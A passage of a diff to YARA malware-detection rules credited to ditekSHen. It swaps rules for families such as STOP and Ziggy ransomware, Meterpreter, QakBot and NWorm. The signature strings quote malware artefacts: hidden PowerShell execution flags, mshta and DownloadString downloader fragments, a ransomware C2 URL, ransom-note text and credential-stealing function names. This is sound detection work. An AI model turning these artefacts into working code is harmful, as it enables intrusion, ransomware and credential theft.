ascii + $s2 = "%.*s.%.*s" fullword ascii + $s3 = "_Tt%cSs%zu%.*s%s" fullword ascii + $s4 = "_Tt%c%zu%.*s%zu%.*s%s" fullword ascii + $s5 = "__ZL20tFirefoxProfilesPath" ascii + $s6 = "__ZL22tFirefoxSearchFileName" ascii + $s7 = "__ZL37tFirefoxDefaultProfileFolderExtension" ascii + $s8 = "__ZL21tFirefoxPrefsFileName" ascii + $s9 = "__GLOBAL__sub_I_Firefox.mm" ascii + $s10 = "add_image_hook_" ascii + $s11 = "/Library/Caches/com.apple.xbs/Sources/arclite/arclite-66/source/" fullword ascii condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0xfacf and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Darktrackrat : FILE +rule DITEKSHEN_MALWARE_Osx_Windtrail : FILE { meta: - description = "Detects OzoneRAT / DarkTrack / DarkSky" + description = "Detects WindTrail OSX trojan" author = "ditekSHen" - id = "ef8675f8-f643-5948-a967-e4a9ce5ab89e" - date = "2024-09-06" - modified = "2024-09-06" + id = "abf7cd20-b37d-5d0a-8f3f-f4e491965713" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5222-L5245" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "2a831c0f7707864d8c9e9fa338085a52933869d8cfbdbe0d12715da301c12646" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3189-L3206" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "291f919cb1e8c4b33960dd3f2c842b9efec04852bd5661543e3ee60bc0fc5ba6" score = 75 - quality = 75 + quality = 73 tags = "FILE" + clamav_sig = "MALWARE.Osx.Trojan.WindTrail" strings: - $x1 = "Klog.dat" ascii - $x2 = "I_AM_DT" ascii - $x3 = " Alien" ascii - $x4 = "Local Victim" ascii - $x5 = "Dtback\\AlienEdition\\Server\\SuperObject.pas" ascii - $x6 = "].encryptedUsername" ascii - $x7 = "].encryptedPassword" ascii - $x8 = { 49 41 4d [6] 44 41 52 [0-2] 4b [6] 44 54 41 43 4b } - $s1 = "AntiVirusProduct" ascii - $s2 = "AntiSpywareProduct" ascii - $s3 = "ConnectServer" ascii - $s4 = "ExecQuery" ascii - $s5 = "\\Drivers\\Etc\\Hosts" fullword ascii - $s6 = "BTMemoryLoadLibary: Get DLLEntyPoint" ascii - $s7 = "\\\\.\\SyserDbgMsg" fullword ascii - $s8 = "\\\\.\\SyserBoot" fullword ascii + $s1 = "m_ComputerName_UserName" fullword ascii + $s2 = "m_uploadURL" fullword ascii + $s3 = "m_logString" fullword ascii + $s4 = "GenrateDeviceName" fullword ascii + $s5 = "open -a" fullword ascii + $s6 = "AESEncryptFile:toFile:usingPassphrase:error:" fullword ascii + $s7 = "scheduledTimerWithTimeInterval:target:selector:userInfo:repeats:" fullword ascii + $s8 = "_kLSSharedFileListSessionLoginItems" fullword ascii + $developerid = "Developer ID Application: warren portman (95RKE2AA8F)" ascii condition: - uint16(0)==0x5a4d and (4 of ($x*) or 6 of ($s*)) + uint16(0)==0xfacf and ( all of ($s*) or $developerid) } import "pe" -rule DITEKSHEN_MALWARE_Win_Godzilla : FILE +rule DITEKSHEN_MALWARE_Osx_Techyutils : FILE { meta: - description = "Detects Godzilla loader" + description = "Detects TechyUtils OSX packages" author = "ditekSHen" - id = "3384b844-6abf-5f94-a62b-7ebbdfe321bd" - date = "2024-09-06" - modified = "2024-09-06" + id = "59fd4165-987f-5b68-9341-d78184b25a1c" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5247-L5265" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ff87fbaaf488ac69e06a03a7f8e5305ec114caa6271c25fa130033f50f0d9095" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3208-L3224" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "071c67cace09dd66233bd4c4dd78c32d0f39f7e38dc06ec62e09fef67762d098" score = 75 - quality = 75 + quality = 73 tags = "FILE" + clamav_sig = "MALWARE.Osx.Trojan.TechyUtils" strings: - $x1 = "MSVBVM60.DLL" fullword ascii - $x2 = "Loginserver8" fullword ascii - $x3 = "Proflogger7" fullword ascii - $s1 = "Badgeless5" fullword ascii - $s2 = "Montebrasite3" fullword ascii - $s3 = "Atelomyelia4" fullword ascii - $s4 = "Xxencoded5" fullword ascii - $s5 = "Garneau2" fullword ascii - $s6 = "Hypostasis0" fullword ascii - $s7 = "Piarhemia4" fullword ascii - $s8 = "Foredestine8" fullword ascii + $s1 = "__ZL58__arclite_NSMutableDictionary__" ascii + $s2 = "__ZL46__arclite_NSDictionary_" ascii + $s3 = "<key>com.apple.security.get-task-allow</key>" fullword ascii + $s4 = "/productprice.svc/GetCountryCode" ascii + $s5 = "@_pthread_mutex_lock" fullword ascii + $s6 = "_mh_execute_header" fullword ascii + $s7 = "/Users/prasoon/Documents/" ascii + $developerid = "Developer ID Application: Techyutils Software Private Limited (VS9Q8BRRRJ)" ascii condition: - uint16(0)==0x5a4d and all of ($x*) and 2 of ($s*) + uint16(0)==0xfacf and ( all of ($s*) or $developerid) } import "pe" -rule DITEKSHEN_MALWARE_Win_UNK03 : FILE +rule DITEKSHEN_MALWARE_Win_Dlagent04 : FILE { meta: - description = "Detects unknown malware" + description = "Detects known downloader agent downloading encoded binaries in patches from paste-like websites, most notably hastebin" author = "ditekSHen" - id = "b0711427-b6bf-5e4b-af36-9c752ead4d6c" - date = "2024-09-06" - modified = "2024-09-06" + id = "d591c591-aecc-557e-85b4-1e2589fbfbf9" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5267-L5280" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "f1a4be68206628c3addbce8b6bbc1f801e67632d4e6a6af1d45cdad833e9a991" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3247-L3263" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "73e6af7c32d38ec5d1d2bc9f2517860367b46779b53e0faff8885b655561ab01" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.DLAgent04" strings: - $s1 = "Software\\Microsoft\\Windows\\CurrentVersion" ascii - $s2 = "rundll32.exe C:\\Windows\\System32\\shimgvw.dll,ImageView_Fullscreen %s" ascii - $s3 = "%s.jpg" ascii - $s4 = "%s\\sz.txt" ascii - $s5 = "ChromeSecsv9867%d7.exe" ascii - $s6 = "%s\\appl%c.jpg" ascii + $x1 = "@@@http" ascii wide + $s1 = "HttpWebRequest" fullword ascii + $s2 = "GetResponseStream" fullword ascii + $s3 = "set_FileName" fullword ascii + $s4 = "set_UseShellExecute" fullword ascii + $s5 = "WebClient" fullword ascii + $s6 = "set_CreateNoWindow" fullword ascii + $s7 = "DownloadString" fullword ascii condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and filesize <300KB and #x1>1 and 4 of ($s*) } import "pe" -rule DITEKSHEN_MALWARE_Win_UNK04 : FILE +rule DITEKSHEN_MALWARE_Win_Gdriverat : FILE { meta: - description = "Detects unknown malware (proxy tool)" + description = "Detects GDriveRAT" author = "ditekSHen" - id = "6a178f37-a9fd-5a83-a550-c6333342ac9b" - date = "2024-09-06" - modified = "2024-09-06" + id = "29e46280-39d1-5d49-ab0d-0a32398b30f0" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5282-L5296" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ba6e5bbc1d094b23e3870af963503d1ccbcd56adc24126b4a38b77d4b88b4b67" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3265-L3284" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "134e66d0afc90e7fbab2c9dd034f85eb504903481e12c1ab8d7bab9321da817a" score = 75 - quality = 75 + quality = 50 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.GDriveRAT" strings: - $x1 = "127.0.0.1/%d" fullword ascii - $x2 = "SYSTEM\\CurrentControlSet\\SERVICES\\PORTPROXY\\V4TOV4\\TCP" fullword ascii - $x3 = "%s rundll32.exe" fullword ascii - $s1 = "kxetray.exe" fullword ascii - $s2 = "ksafe.exe" fullword ascii - $s3 = "Mcshield.exe" fullword ascii - $s4 = "Miner.exe" fullword ascii + $h1 = "https://www.googleapis.com/upload/drive/v3/files?uploadType=multipart" fullword wide + $h2 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" fullword wide + $h3 = "multipart/related; boundary=\"boundary_tag\"" fullword wide + $h4 = "https://www.googleapis.com/drive/v3/files" fullword wide + $s1 = "move gdrive.exe \"C:\\Users\\" fullword wide + $s2 = "file_data" fullword ascii + $s3 = "comp_id" fullword ascii + $s4 = "file_name" fullword ascii + $s5 = "refresh_token" fullword ascii + $s6 = "commands" fullword ascii + $s7 = "execute" fullword ascii condition: - uint16(0)==0x5a4d and all of ($x*) and 2 of ($s*) + uint16(0)==0x5a4d and 3 of ($h*) and 5 of ($s*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Karkoff : FILE +rule DITEKSHEN_MALWARE_Win_STOP : FILE { meta: - description = "Detects Karkoff" + description = "Detects STOP ransomware" author = "ditekSHen" - id = "7d2fe783-18b3-5d84-a9b5-e8e0b5a0db98" - date = "2024-09-06" - modified = "2024-09-06" + id = "e928d917-a9d9-5830-938a-59b62608e84c" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5298-L5313" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e9b6ba5be2b3cd0faa898347e57cee5a57b80b19842c3a1ddb42d620307c8b39" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3286-L3309" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "61f7e7c1139c56088b2f58b78ae132ffcfef0f931c15b67ea775b0d5e51d189d" score = 75 - quality = 75 + quality = 73 tags = "FILE" + snort2_sid = "920113" + snort3_sid = "920111" + clamav_sig = "MALWARE.Win.Ransomware.STOP" strings: - $x1 = "C:\\Windows\\Temp\\MSEx_log.txt" fullword wide - $x2 = "CMD.exe" fullword wide - $x3 = "Karkoff.ProjectInstaller.resources" fullword ascii - $s1 = /try\shttp(s)?\s(ip|domain)/ fullword wide - $s2 = "Reg cleaned!" fullword wide nocase - $s3 = "Content-Disposition: form-data; name=\"{1}\"" fullword wide - $s4 = "^[A-Fa-f0-9]{8}-([A-Fa-f0-9]{4}-){3}[A-Fa-f0-9]{12}$" fullword wide - $s5 = "new backdoor" fullword wide + $x1 = "C:\\SystemID\\PersonalID.txt" fullword wide + $x2 = "/deny *S-1-1-0:(OI)(CI)(DE,DC)" wide + $x3 = "e:\\doc\\my work (c++)\\_git\\encryption\\" ascii wide nocase + $s1 = "\" --AutoStart" fullword ascii wide + $s2 = "--ForNetRes" fullword wide + $s3 = "--Admin" fullword wide + $s4 = "%username%" fullword wide + $s5 = "?pid=" fullword wide + $s6 = /&first=(true|false)/ fullword wide + $s7 = "delself.bat" ascii + $mutex1 = "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}" fullword ascii + $mutex2 = "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}" fullword ascii + $mutex3 = "{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}" fullword ascii condition: - uint16(0)==0x5a4d and ( all of ($x*) or 4 of ($s*) or (2 of ($x*) and 2 of ($s*))) + uint16(0)==0x5a4d and ((2 of ($x*) and 1 of ($mutex*)) or ( all of ($x*)) or (6 of ($s*) and (1 of ($x*) or 1 of ($mutex*))) or (9 of them )) } import "pe" -rule DITEKSHEN_MALWARE_Win_Dlagent09 : FILE +rule DITEKSHEN_MALWARE_Win_Parallaxrat : FILE { meta: - description = "Detects known downloader agent" + description = "Detects ParallaxRAT" author = "ditekSHen" - id = "90f71ac7-19d9-5a8e-9830-df2f16e12c9b" - date = "2024-09-06" - modified = "2024-09-06" + id = "e602b28f-ae5d-52af-b1c5-5c41776dd4c5" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5315-L5328" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "9336507fa4bb9d3a6325d5e9caafc8c4e816a0166fded7d4e53e09a87628bc89" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3311-L3328" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "7fd94dee44079b595b906f1687f44b51b8cebabbeb0900563b8d4fcc0e46bdd0" score = 75 - quality = 71 + quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.ParallaxRAT" strings: - $h1 = "//:ptth" ascii wide nocase - $h2 = "//:sptth" ascii wide nocase - $s1 = "DownloadString" fullword ascii wide - $s2 = "StrReverse" fullword ascii wide - $s3 = "FromBase64String" fullword ascii wide - $s4 = "WebClient" fullword ascii wide + $s1 = "[Clipboard End]" fullword wide + $s2 = "[Ctrl +" fullword wide + $s3 = "[Alt +" fullword wide + $s4 = "Clipboard Start" wide + $s5 = "(Wscript.ScriptFullName)" wide + $s6 = "CSDVersion" fullword ascii + $s7 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" fullword ascii + $x1 = { 2e 65 78 65 00 00 84 00 00 4d 5a 90 00 } + $x2 = "This program cannot be run in DOS mode" ascii condition: - uint16(0)==0x5a4d and (1 of ($h*) and all of ($s*)) + (( uint16(0)==0x5a4d and all of ($s*)) or all of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Coinminingbot : FILE +rule DITEKSHEN_MALWARE_Win_Meterpreter : FILE { meta: - description = "Detects coinmining bot" + description = "Detects Meterpreter payload" author = "ditekSHen" - id = "df15bfbd-f531-5eaa-b160-ad8a1fbe992f" - date = "2024-09-06" - modified = "2024-09-06" + id = "d72fef80-d624-5e39-963a-8d7c12eb2d9c" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5330-L5343" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "a307a6c9184e8f4068cfa89a8432ae017c8aab10b706ba065051f8749860c15c" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3330-L3343" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "5226cd7bb2344b822ee94d75f81a523ff701778de97a32ae52c604a4855e960c" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "FullScreenDetect" fullword ascii - $s2 = "GetChildProcesses" fullword ascii - $s3 = "HideBotPath" fullword ascii - $s4 = "Inject" fullword ascii - $s5 = "DownloadFile" fullword ascii - $s6 = "/Data/GetUpdateInfo" wide + $s1 = "PACKET TRANSMIT" fullword ascii + $s2 = "PACKET RECEIVE" fullword ascii + $s3 = "\\\\%s\\pipe\\%s" fullword ascii wide + $s4 = "%04x-%04x:%s" fullword wide + $s5 = "server.dll" fullword ascii condition: - uint16(0)==0x5a4d and 5 of them + ( uint16(0)==0x5a4d and all of them ) or ( filesize <300KB and all of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Fyanti : FILE +rule DITEKSHEN_MALWARE_Win_Trojan_Expresscms : FILE { meta: - description = "Hunt for FYAnti third-stage loader DLLs" + description = "Detects ExpressCMS" author = "ditekSHen" - id = "7a1f913c-d83f-50e9-943c-246c4c71c654" - date = "2024-09-06" - modified = "2024-09-06" + id = "d096db0c-05f6-5b69-9d84-0105f2182ff3" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5345-L5351" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "baaeef0b1452d7ea41ffaaff592cac2c5e16f921dbbfb3a300a63e69f134e9d0" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3366-L3382" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "64d551e0c11b6394f9ae2b8fa749c36cb1b5c3f498592f95dc19fdea23c53160" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.ExpressCMS" + + strings: + $s1 = "/click.php?cnv_id=" fullword wide + $s2 = "/click.php?key=" wide + $s3 = "jdlnb" fullword wide + $s4 = "Gkjfdshfkjjd: dsdjdsjdhv" fullword wide + $s5 = "--elevated" fullword wide + $s6 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\%d" wide + $s7 = "\\Microsoft\\Manager.exe" fullword wide + $s8 = "\\Microsoft\\svchost.exe" fullword wide condition: - uint16(0)==0x5a4d and pe.is_dll() and pe.exports("FuckYouAnti") + uint16(0)==0x5a4d and 6 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Dlagent10 : FILE +rule DITEKSHEN_MALWARE_Win_Meterpreterstager : FILE { meta: - description = "Detects known downloader agent" + description = "Detects Meterpreter stager payload" author = "ditekSHen" - id = "b5807adf-9d15-5e08-97fb-a529acb1c1eb" - date = "2024-09-06" - modified = "2024-09-06" + id = "dfbc37e9-13e0-55e2-a501-1005eea52b63" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5353-L5364" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "74647b39331727000608bc89b30189d802e62d59876659d4477deb4da2fcfe13" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3384-L3395" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "0ac53a10abb1e4dd7da57872cd1779851d953127a912c31a5e411d8eb9bd07f4" score = 75 - quality = 67 + quality = 75 tags = "FILE" strings: - $s1 = "powershell.exe" ascii wide nocase - $s2 = ".DownloadFile(" ascii wide nocase - $s3 = "_UseShellExecute" ascii wide nocase - $s4 = "_CreateNoWindow" ascii wide nocase + $s1 = "PAYLOAD:" fullword ascii + $s2 = "AQAPRQVH1" fullword ascii + $s3 = "ws2_32" fullword ascii + $s4 = "KERNEL32.dll" fullword ascii condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and all of them and filesize <100KB } import "pe" -rule DITEKSHEN_MALWARE_Win_Pureloader : FILE +rule DITEKSHEN_MALWARE_Win_Ziggy : FILE { meta: - description = "Detects Pure loader / injector" + description = "Detects Ziggy ransomware" author = "ditekSHen" - id = "ad44a12a-4ac7-5cc7-92ab-13c23514de69" - date = "2024-09-06" - modified = "2024-09-06" + id = "6d2d316a-cf19-5001-bf94-842346229d76" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5366-L5382" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "1f0bd20e769ea79d28d6e60ca06aa8aa2b3436426cfe0cd4f2023a08236875cd" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3397-L3421" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "103a50511971161ca673e0c8378aeca2fa7d0f6309966bbb2b70e0d039e0f196" score = 75 quality = 75 tags = "FILE" + snort2_sid = "920098" + snort3_sid = "920096" + clamav_sig = "MALWARE.Win.Ransomware.Ziggy" strings: - $s1 = "InvokeMember" fullword wide - $s2 = "ConcatProducer" fullword wide - $s3 = ".Classes.Resolver" wide - $s4 = "get_DLL" fullword ascii - $s5 = "BufferedStream" fullword ascii - $s6 = "GZipStream" fullword ascii - $s7 = "MemoryStream" fullword ascii - $s8 = "Decompress" fullword ascii - $s9 = "lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.R" ascii + $id1 = "/Ziggy Info;component/mainwindow.xaml" fullword wide + $id2 = "AZiggy Info, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" fullword ascii + $id3 = "Ziggy Ransomware" fullword wide + $id4 = "clr-namespace:Zeggy" fullword ascii + $s1 = "GetCooldown" fullword ascii + $s2 = "checkCommandMappings" fullword ascii + $s3 = "add_OnExecuteCommand" fullword ascii + $s4 = "MindLated.jpg" fullword wide + $s5 = "http://fixfiles.xyz/ziggy/api/info.php?id=" fullword wide + $s6 = "Reamaining time:" fullword wide + $msg1 = "<:In case of no answer in 12 hours write us to this e-mail" ascii + $msg2 = "Free decryption as guarantee" fullword ascii + $msg3 = "# Do not try to decrypt your data using third party software, it may cause permanent data loss" ascii + $msg4 = "# Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can becom" ascii condition: - uint16(0)==0x5a4d and 8 of them + uint16(0)==0x5a4d and (3 of ($id*) or 4 of ($s*) or 3 of ($msg*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_VBS_Dlagent01 +rule DITEKSHEN_MALWARE_Win_Nworm : FILE { meta: - description = "Detects VBS MSHTA downloader" + description = "Detects NWorm/N-W0rm payload" author = "ditekSHen" - id = "447ea323-ecab-5f6b-b13e-0690254c754e" - date = "2024-09-06" - modified = "2024-09-06" + id = "06546ccf-8914-5b1c-942f-99664b9ecf44" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5384-L5395" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0e47839a55773764aca0aebcf1078c06c729b86d1e2f18d7d64e3bb11e87f3eb" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3423-L3443" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a1397a057422be260b5bdf1eb58571e95c259c132cc2518b39e1524a0eda9c66" score = 75 quality = 75 - tags = "" + tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.NWorm" strings: - $s1 = "llehS.tpircsW" ascii - $s2 = ".Run" ascii - $s3 = "mshta http" ascii nocase - $s4 = "StrReverse" ascii + $id1 = "N-W0rm" ascii + $id2 = "N_W0rm" ascii + $x1 = "pongPing" fullword wide + $x2 = "|NW|" fullword wide + $s1 = "runFile" fullword wide + $s2 = "runUrl" fullword wide + $s3 = "killer" fullword wide + $s4 = "powershell" fullword wide + $s5 = "wscript.exe" fullword wide + $s6 = "ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File \"" fullword wide + $s7 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" fullword wide + $s8 = "Start-Sleep -Seconds 1.5; Remove-Item -Path '" fullword wide condition: - all of them + uint16(0)==0x5a4d and ((1 of ($id*) and (1 of ($x*) or 3 of ($s*))) or ( all of ($x*) and 2 of ($s*)) or 7 of ($s*) or 10 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Ranumbot : FILE +rule DITEKSHEN_MALWARE_Win_Qakbot : FILE { meta: - description = "Detects RanumBot / Windigo / GoStealer" + description = "Detects variants of QakBot payload" author = "ditekSHen" - id = "26a0832e-8a39-5a0e-bd39-710744212c16" - date = "2024-09-06" - modified = "2024-09-06" + id = "3a3b3b6c-0969-584e-a184-7acfca3cdd42" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5397-L5430" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "a9c32445e62d072e4184d25497696ef6225edb176dc7a9743a54194d4ddb4b0c" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3445-L3457" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b64c05eb7ac03b2b4709f9979d117e4cacc617f21d0b3bf1c1be42aa18cc44cc" score = 75 quality = 73 tags = "FILE" strings: - $f1 = "main.addSchedulerTaskSSH" fullword ascii - $f2 = "main.attackRouter" fullword ascii - $f3 = "main.decryptPassword" fullword ascii - $f4 = "main.handleScanRequest" fullword ascii - $f5 = "main.scanNetwork" fullword ascii - $f6 = "main.extractCredentials" fullword ascii - $s1 = "H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s/16%s:%d%s:22+0330+0430+0530+0545+0630+0845+10" ascii - $s2 = "<== as at fp= is lr: of on pc= sp: sp=) = ) m=+Inf, n -Inf00%x112212343125: p=ABRTACDTACSTAEDTAESTAKDTAKSTALRMAWSTAhomAtoiCESTChamDashEESTGOGCJulyJuneKILLLEAFLisuMiaoModiNZDTNZSTNewaPIPEQUITSASTSEGVTERMThai" ascii - $s3 = "W*struct { P *big.Int; Q *big.Int; G *big.Int; Y *big.Int; Rest []uint8 \"ssh:\\\"rest\\\"\" }" ascii - $s4 = "policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write" ascii - $s5 = "/Users/alexander/go/src/mikrotik/winbox.go" ascii - $xf1 = "main.readConfig" fullword ascii - $xf2 = "main.ensureRunningAsUser" fullword ascii - $xf3 = "main.configRegPath" fullword ascii - $xf4 = "main.oldConfigRegPath" fullword ascii - $uf1 = "main.locateChrome" fullword ascii - $uf2 = "main.decryptAndUploadProfile" fullword ascii - $uf3 = "main.decryptCookies" fullword ascii - $uf4 = "main.extractPasswords" fullword ascii - $uf5 = "main.getFirefoxProfile" fullword ascii - $uf6 = "main.postBrowsersData" fullword ascii - $uf7 = "main.uploadFirefoxProfile" fullword ascii - $uf8 = "main.zipFirefoxProfile" fullword ascii - $uf9 = /main\.detect(Browsers|Chrome|Coccoc|Edge|Firefox|InternetExplorer|Opera|Yandex)/ fullword ascii + $s1 = "stager_1.dll" fullword ascii + $s2 = "_vsnwprintf" fullword ascii + $s3 = "DllRegisterServer" fullword ascii + $s4 = "Win32_PnPEntity" fullword wide + $s5 = "0>user32.dll" fullword ascii condition: - uint16(0)==0x5a4d and (5 of ($f*) or 4 of ($s*) or (2 of ($f*) and 2 of ($s*)) or ( all of ($xf*) and 1 of ($uf*)) or 6 of ($uf*)) + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Dllhijacker01 : FILE +rule DITEKSHEN_MALWARE_Win_Fonix : FILE { meta: - description = "Hunt for VSNTAR21 / DllHijacker01 IronTiger / LuckyMouse / APT27 malware" + description = "Detects Fonix ransomware" author = "ditekSHen" - id = 